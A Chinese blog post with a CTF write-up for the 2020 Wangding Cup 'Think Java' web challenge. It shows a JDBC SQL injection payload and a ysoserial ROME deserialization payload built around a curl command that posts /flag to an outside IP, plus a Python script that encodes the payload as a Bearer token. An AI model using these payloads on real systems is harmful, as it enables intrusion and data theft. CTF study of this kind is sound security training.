第二届网鼎杯(第三场:朱雀组)Think Java

最新推荐文章于 2024-05-08 09:33:46 发布
最新推荐文章于 2024-05-08 09:33:46 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/106225875
版权
首先题目给了一些class文件,这些不需要多说,直接jd-gui反编译或者使用fernflower反编译也可以

解题过程

  • 先扫一下目录
    得到swagger-ui.html
    发现几个api接口

  • sql注入得到密码
    在这里插入图片描述源代码中明显存在SQL注入(dbName可控),但是必须满足两个条件,否则不能连接数据库

    • #号在引号里面时当做填充符,没有实际意义(这个只是在jdbc中这样?还没来得及验证)
    • 最终:
      • jdbc:mysql://mysqldbserver:3306/myapp#‘ union select 1#
      • Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema =‘myapp#‘ union select 1# and table_name = ‘xxx’
        在这里插入图片描述在这里插入图片描述这儿的#号对查询没有影响~
    • 查询密码
      在这里插入图片描述

  • 登录获得token
    在这里插入图片描述这个一看就知道是java的序列化后的base64编码(如果以aced则为java序列化后的hex编码)

    然后我们把返回的data值输入到/common/user/current 接口中,则显示操作成功
    在这里插入图片描述所以我们知道会在这个接口中进行java的反序列化

  • getflag
    我们直接用ysoserial来生成反序列化的值
    在这里插入图片描述java -jar ysoserial-0.0.5.jar ROME "curl http://174.1.101.83:555 -d @/flag" > HyyMbb.bin

然后进行编码

import base64
file = open("HyyMbb.bin","rb")
now = file.read()
ba = base64.b64encode(now)
#print(ba)
print("Bearer "+ba.decode('utf-8'))
#可以解注释此段,并注释上一条print,便于快速测试
file.close()

发送数据,在vps上监听555端口就可以获得flag了~~

参考链接
HyyMbb
关注
专栏目录
2020第二届网鼎杯 朱雀部分writeup
weixin_44145820的博客
05-18 1740
tree 这题有个神奇的树(有点像哈弗曼树),叶子是b-z的字母 用od动态运行一下,把树画了出来 我们的输入会控制左走还是右走,48(‘0’)是左,49(‘1’)是右,而这个实际上是把数字转化为长度为4的01字符串 最后我们要弄出这个字符串:zvzjyvosgnzkbjjjypjbjdvmsjjyvsjx 根据字符串反推出48和49的集合 target = 'zvzjyvosgnzkbjjjypjbjdvmsjjyvsjx' tree = {} tree['z'] = [49,48,49,48] t
【CTF】java反序列-2020-网鼎杯-朱雀-Web-think_java
(∪.∪ )...zzz的博客
06-13 3625
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
《thinkjava
04-08
《Think Java》作者:Allen B. Downey and Chris Mayeld。 Java学习资料,适合入门。是英文版的。
网鼎杯 2020 朱雀】Think Java
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-08 4818
网鼎杯 2020 朱雀】Think Java 首先下载题目附件,是一些.class文件,反编译查看。 注意到引入的其中一个包: import io.swagger.annotations.ApiOperation; Swagger Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。 Swagger UI 提供了
网鼎杯2020朱雀-web(Think Java)
weixin_43610673的博客
05-19 2529
下载class.zip解压后用jd-gui查看源码,我是用jd-gui弄出来然后sublime看的 在/common/test/sqlDict有个注入 主要是SqlDict.class 下面注入即可dbName=myapp?useUnicode=true’union/**/select/**/1 这里用post或者get提交都行 dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(informati
Thinking in Java 8
morningbird的专栏
07-25 1346
第7章 多形性“对于面向对象的程序设计语言,多型性是第三种最基本的特征(前两种是数据抽象和继承。”“多形性”(Polymorphism)从另一个角度将接口从具体的实施细节中分离出来,亦即实现了“是什么”与“怎样做”两个模块的分离。利用多形性的概念,代码的织以及可读性均能获得改善。此外,还能创建“易于扩展”的程序。无论在项目的创建过程中,还是在需要加入新特性的时候,它们都可以方便地“成长”。通过合
Think Java 4 学习笔记
yufuer的专栏
06-02 96
ti记: 最近在看Think Java 4(中文),顺便把学习笔记记下来供以后参看。其中包含之前理解不到位的、含糊的、不清楚的简要说明。 第1章 对象导论 ··· ···     第2章 一切都是对象 2.1引用操作对象 一切都看做对象,但操作的标示符实际上是对象的一个引用。 2.2必须由你创建所有对象 5个储存的位置,基本类型特例(适配器模式); java中的数与...
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
Think Java.zip
07-23
java编程思想pdf版本 这也是我自己一直看的一个版本很清晰 可以电脑 手机看 也可以在Kindle 看
[网鼎杯 2020 朱雀]Think Java
Sk1y的博客
04-07 2224
[网鼎杯 2020 朱雀]Think Java 文章目录[网鼎杯 2020 朱雀]Think Java获取源文件SwaggerJDBC sql注入关于#的使用查看数据库名字获取表名获取字段名获取字段值对序列化字符串分析java Deserialization Scanner插件使用ysoserialcurl将flag带出来反弹shell参考文章 获取源文件 下载jar包,扔进jd-gui查看源码 主要是4个文件 Test.java 接收dbName参数,然后调用getTableData方法 packa
CTFHub靶场 --题目:think_java
weixin_52221158的博客
08-18 534
推测与sql注入有关,打开sqldict.class,发现连接数据库的代码 以及数据库查询语句。让你看的是那个返回包里面的ctfhub账户名,说明这个账户名是被反序列化过后得到值。返回data,以rO0AB开头,java序列化,在身份认证处提交。相当于把服务器的token数据先base64解密,再反序列化。生成bin文件,在进行base64加密,文件更改名字即可。此处为请求地址,加入请求,并结合代码加入注入代码。开始入手,burp抓包,发至repeater。在该接口测试登录,try it out。...
CTFHUB-think_java(2020-网鼎杯-朱雀-Web-think_java)
qq_51953382的博客
07-20 408
将编码后的内容填充到命令上,再通过ysoserial获得bin文件,拿到文件之后,我们还需要对其进行base64加密,这里使用的一个Python脚本。但是这是网鼎杯原题的payload,那个题目中flag名称就是flag,是不变的所以可以这么用,通过-d @来提取flag文件内容然后发到自己服务器。获得payload之后,先在咱们的服务器上监听端口之后,在另一个接口处输入payload,来进行反弹shell,注意开头的Bearer保留。进入之后,将我们的得到的信息输入登录实例,来进行调用。
Think in Java(一)
如雨随行的博客
07-05 1555
把对象想象为“服务提供者” 通常被隐藏的部分是对象内部脆弱的部分 合和聚合 合:使用现有的类合成新的 聚合:当合是动态发生的时候,被称为聚合 合经常被视为(has-a)关系,例如汽车拥有引擎。 在建立新类时,应该先考虑合,因为它更加简单灵活。 单根继承结构的优点: 1)所有对象都可以很容易地在堆上创建,而参数传递也得到了极大的简化。 2) 单根继承结构使垃圾回收器的实...
java think_ThinkJava-输入和输出
weixin_36201438的博客
02-20 201
//Static functions for reading and writing text files as//a single string, and treating a file as an ArrayList.packagecom.java.io;importjava.io.BufferedReader;importjava.io.File;importjava.io.FileRead...
Think in java读书笔记
Android_Java_student的博客
09-06 377
第七章:多态性 1、“封装”通过将数据的特征与行为结合在一起,创建了一种新的数据类型。“隐藏实现”通过将细节设置成private,完成了接口与实现的分离。而多态性是站在“类”的角度来     处理这种逻辑上的分离的。    (chap7,P2) 2、“上传”使得类的动态性得以实现,但需要注意的是,只有基类是public的情况下,扩展类的复写才可以实现,比如下面的例子:  
探索与实践:《Think Java》代码库
最新发布
gitblog_00043的博客
05-08 239
探索与实践:《Think Java》代码库 ThinkJavaCodeSupporting code for Think Java by Allen Downey and Chris Mayfield.项目地址:https://gitcode.com/gh_mirrors/th/ThinkJavaCode 1. 项目介绍 欢迎来到ThinkJavaCode,这是一个专门为《Think Java》...
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是网络安全工作者必备的工具之一。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值